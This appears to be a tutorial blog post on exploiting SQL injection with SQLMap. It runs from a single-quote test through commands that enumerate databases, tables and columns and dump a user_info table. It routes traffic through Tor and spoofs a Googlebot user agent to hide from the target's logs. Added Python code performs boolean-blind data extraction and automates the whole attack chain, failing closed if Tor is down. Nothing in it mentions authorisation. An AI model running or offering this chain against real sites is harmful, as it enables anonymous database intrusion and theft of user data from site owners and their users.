SQLMap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers. SQLMap can enumerate users, password hashes, privileges, roles, databases, tables and columns.
1. Testing
The quickest manual check is to append a single quote to a parameter that the page passes to its database. For example:
http://www.testwebsitesql.com/cgi-bin/item.cgi?item_id=15
would become
http://www.testwebsitesql.com/cgi-bin/item.cgi?item_id=15'
If the quote breaks the query, the application responds differently (a database error, an empty result or a changed page), and that parameter is a candidate for SQLMap.
Difference between standard SQL injection and blind SQL injection
When an attacker exploits an SQL injection flaw, the web application sometimes displays error messages from the database complaining that the query's syntax is incorrect, and those messages can carry data straight out of the database (error-based injection). Blind SQL injection is the same flaw, but the application shows neither a database error nor any query output. Data has to be inferred from side effects instead: whether a true and a false condition produce different pages (boolean-based), or whether a deliberately slow query delays the response (time-based). Because nothing in the response says "SQL", blind injection is harder to find and much slower to exploit, since each bit of data costs at least one request. SQLMap automates both kinds.
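To make the distinction concrete, here is an added Python example, not from the original post, that builds a throwaway SQLite database with a constructed items table and exposes the same concatenation flaw through two imaginary front ends: one that echoes the database error (the standard case) and one that swallows it (the blind case). The boolean probe and the character-by-character extraction are the technique SQLMap's boolean-based blind mode automates; the table, its rows and the function names are assumptions for this demo.

```python
import sqlite3

# Constructed demo database (not from the original post): one items table.
def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE items (item_id INTEGER, name TEXT)")
    con.executemany("INSERT INTO items VALUES (?, ?)",
                    [(15, "widget"), (16, "gadget")])
    return con

def vulnerable_query(con, item_id):
    # Deliberately vulnerable: the request parameter is concatenated into
    # the SQL text. This is the flaw that item_id=15' exposes.
    sql = "SELECT name FROM items WHERE item_id = " + item_id
    return con.execute(sql).fetchall()

def verbose_app(con, item_id):
    """Standard injection: the raw DBMS error text reaches the response."""
    try:
        rows = vulnerable_query(con, item_id)
        return 200, ("found" if rows else "no such item")
    except sqlite3.Error as exc:
        return 500, "Database error: " + str(exc)

def blind_app(con, item_id):
    """Blind injection: same flaw, but errors collapse into the generic page."""
    try:
        rows = vulnerable_query(con, item_id)
        return 200, ("found" if rows else "no such item")
    except sqlite3.Error:
        return 200, "no such item"

def boolean_blind_probe(app, con, base):
    """Detect injectability without any error text: a syntactically valid
    true condition must look like the original page and a false one must not."""
    original = app(con, base)[1]
    true_page = app(con, base + " AND 1=1")[1]
    false_page = app(con, base + " AND 1=2")[1]
    return true_page == original and false_page != original

def blind_extract(app, con, base, expr,
                  alphabet="abcdefghijklmnopqrstuvwxyz", max_len=16):
    """Recover the string value of a subquery one character at a time using
    only the true/false page difference (what SQLMap's boolean-based blind
    technique does, minus its binary search and charset tricks). Each
    character costs up to len(alphabet) requests, which is why blind
    extraction is so much slower than reading an error message."""
    true_page = app(con, base)[1]
    out = ""
    for pos in range(1, max_len + 1):
        for ch in alphabet:
            probe = f"{base} AND substr(({expr}),{pos},1)='{ch}'"
            if app(con, probe)[1] == true_page:
                out += ch
                break
        else:
            break  # no character matched: end of string
    return out
```

Running `blind_extract(blind_app, make_db(), "15", "SELECT name FROM items WHERE item_id=16")` pulls the second row's name out of the blind front end one letter at a time, even though that front end never returns anything except "found" or "no such item".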
2. Let's start. Open a new terminal and run the following command to confirm that SQLMap is installed:
# sqlmap
If SQLMap prints its usage banner, it is working. Next we install Tor, which keeps our own network address out of the target's logs.
Tor (The Onion Router) aims to conceal its users’ identities and their online activity from surveillance and traffic analysis by separating identification and routing. It is an implementation of onion routing, which encrypts and then randomly bounces communications through a network of relays run by volunteers around the globe.
Open up a new terminal and use the following command to install Tor.
# apt-get install tor
After Tor has installed you can start it from a terminal with "tor".
When Tor has finished bootstrapping (the log reaches "Bootstrapped 100%"), leave that terminal running in the background and open a new one. On Debian-based systems the package may already have started Tor as a service; if the new instance complains that port 9050 is in use, the service is already listening and you can skip this step.
Depending on the network setup we may want to run SQLMap directly, through a VPN, or through Tor; adding a random or spoofed user agent on top of Tor gives a little extra anonymity.
Below are several ways to list the DBMS databases with SQLMap. If you are unsure which one to use, pick "Listing DBMS databases using Tor + Google user agent" for anonymity.
3. Listing DBMS databases SQLMap
sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 --dbs
What this command does:
sqlmap = name of the sqlmap binary to execute
-u = target URL (e.g. "http://www.testwebsite.com/cgi-bin/item.cgi?item_id=15")
--dbs = tell SQLMap to enumerate the DBMS databases
Listing DBMS databases using Tor with SQLMap for anonymity.
Add these options to your sqlmap command to route it through Tor:
--tor --tor-type=SOCKS5
This tells SQLMap to send its requests through the local Tor SOCKS5 proxy (usually 127.0.0.1:9050; --tor-port overrides the port) instead of directly from our own network address. Adding --check-tor makes SQLMap verify that traffic really leaves through Tor before it sends any payload, which is worth doing every time, since a Tor process that died would otherwise leave you talking to the target directly.
For example:
sqlmap -u http://target-website.com/listproducts.php?cat=2 --tor --tor-type=SOCKS5
Listing DBMS databases using Tor + Google user agent with SQLMap for anonymity.
I will be using Tor and setting a Google crawler as the user agent for additional obscurity. Google's crawlers visit most websites, so this string is one of the least suspicious entries in the target's access logs, and we can use that to our advantage with the following command:
sqlmap -u http://target-website.com/listproducts.php?cat=2 --tor --tor-type=SOCKS5 --user-agent="Googlebot (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
Note that the user-agent value contains spaces and must be quoted in full. Note also that this only changes the User-Agent header: the requests still arrive from a Tor exit node, and an administrator who checks the source address against Google's published crawler ranges will see it is not Google, so the disguise is shallow.
Now that we can see which databases exist, it is time to extract some information from one of them.
4. Listing the tables in the target database.
To list the tables of a database, use the following command:
sqlmap -u http://www.target-website.com/cgi-bin/item.cgi?item_id=15 -D database_name --tables --tor --tor-type=SOCKS5 --user-agent="Googlebot (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
Replace database_name after -D with the name of the database you are targeting, taken from the --dbs output.
SQLMap will now list the tables in that MySQL database.
Listing the columns of a table
sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite -T user_info --columns --tor --tor-type=SOCKS5 --user-agent="Googlebot (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
Dumping the contents of a target column
sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite -T user_info -C user_login --dump --tor --tor-type=SOCKS5 --user-agent="Googlebot (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
With the final --dump command we have gone from a single injectable parameter to the contents of a chosen column. SQLMap prints the dumped rows to the terminal and also writes them to a CSV file in its output directory, whose path it reports at the end of the run. Omit -C to dump every column of the table, or use --dump-all to dump everything the injection can reach; both generate many more requests, which is slow over Tor and very noisy in the target's logs.
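As an added example that is not part of the original post or of SQLMap itself, the following Python wrapper builds the four commands from steps 3 and 4 as argument lists, so the long Googlebot string needs no shell quoting, and refuses to launch unless something is accepting connections on Tor's SOCKS port. The target URL, the database, table and column names, and the 127.0.0.1:9050 Tor address are assumptions; the sqlmap flags are the real ones.

```python
import shlex
import shutil
import socket
import subprocess

# Assumed values (not from the original post): Tor's local SOCKS port and a
# placeholder target. The Googlebot string is the one the post uses.
TOR_HOST, TOR_PORT = "127.0.0.1", 9050
GOOGLEBOT_UA = "Googlebot (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"


def tor_is_listening(host=TOR_HOST, port=TOR_PORT, timeout=2.0):
    """Refuse to start if nothing accepts connections on the SOCKS port, so a
    Tor that is not running can never quietly turn into a direct connection."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False


def build_cmd(target, db=None, table=None, column=None, dump=False,
              use_tor=True, user_agent=GOOGLEBOT_UA):
    """Assemble one sqlmap invocation as an argv list. Passing a list to
    subprocess sidesteps the shell quoting that the user-agent string needs."""
    cmd = ["sqlmap", "-u", target, "--batch"]  # --batch: never block on prompts
    if use_tor:
        # --check-tor makes sqlmap verify the tunnel before sending payloads.
        cmd += ["--tor", "--tor-type=SOCKS5", f"--tor-port={TOR_PORT}", "--check-tor"]
    if user_agent:
        cmd += ["--user-agent", user_agent]
    if db is None:
        cmd.append("--dbs")
        return cmd
    cmd += ["-D", db]
    if table is None:
        cmd.append("--tables")
        return cmd
    cmd += ["-T", table]
    if column is not None:
        cmd += ["-C", column]
    cmd.append("--dump" if dump else "--columns")
    return cmd


def enumeration_chain(target, db, table, column):
    """Steps 3 and 4 of the post in order: databases, tables, columns, dump."""
    return [
        build_cmd(target),
        build_cmd(target, db),
        build_cmd(target, db, table),
        build_cmd(target, db, table, column, dump=True),
    ]


def run_chain(target, db, table, column, dry_run=False):
    """Run the chain, or with dry_run just render it. Returns the sqlmap exit
    codes, or the shell-quoted command lines when dry_run is set."""
    cmds = enumeration_chain(target, db, table, column)
    if dry_run:
        return [shlex.join(c) for c in cmds]
    if shutil.which("sqlmap") is None:
        raise RuntimeError("sqlmap is not in PATH")
    if not tor_is_listening():
        raise RuntimeError(f"nothing listening on {TOR_HOST}:{TOR_PORT}; start tor first")
    return [subprocess.run(c, check=False).returncode for c in cmds]


if __name__ == "__main__":
    # Dry run against the post's placeholder names: prints the four commands.
    for line in run_chain("http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15",
                          "sqldummywebsite", "user_info", "user_login", dry_run=True):
        print(line)
```

The dry run shows the exact lines you would otherwise type by hand, with the user agent correctly quoted; drop dry_run to execute them in sequence, and the Tor check fails closed rather than letting a dead proxy expose your real address.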